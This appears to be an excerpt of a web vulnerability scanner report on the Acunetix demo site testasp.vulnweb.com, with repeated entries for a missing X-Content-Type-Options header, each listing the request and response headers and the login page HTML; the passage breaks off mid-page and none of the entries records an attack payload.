<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- 